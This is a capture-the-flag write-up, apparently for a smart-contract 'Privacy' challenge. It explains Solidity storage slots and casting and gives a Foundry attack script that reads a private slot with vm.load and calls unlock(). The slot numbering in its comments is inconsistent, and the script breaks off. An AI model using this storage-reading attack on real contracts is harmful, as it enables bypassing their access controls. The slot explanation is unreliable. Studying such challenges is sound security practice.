Our mission here is to unlock the contract by changing the variable locked
from true
to false
As the description says, "We need to understand how storage works". A must-read is this article from Alchemy: Smart Contract Storage Layout.
Since we have to read the second element of the data
array, we can see that it'll be in the 5th storage slot:
bool public locked = true; // slot 1
uint256 public ID = block.timestamp; // slot 2
uint8 private flattening = 10; // slot3
uint8 private denomination = 255; // slot3
uint16 private awkwardness = uint16(block.timestamp); // slot3
bytes32[3] private data; // slots 4-6
We also need to understand how casting works. For this case, we need to know how casting from bytes32
to bytes16
works. In this case, bytes16
will keep the 16 most significant bytes (the leftmost bytes).
For solving this challenge, we have to read the storage and perform the casting. I wrote a script that automates all of this:
//SPDX-License-Identifier: MIT
pragma solidity 0.8.20;
import {Script} from "forge-std/Script.sol";
contract AttackScript is Script {
address instance = /* Your instance address */;
function run() public {
bytes32 secret = vm.load( instance, bytes32(uint256(5)) ); //vm.load loads the value from storage at fifth slot
instance.call(abi.encodeWithSignature("unlock(bytes16)", bytes16(secret)));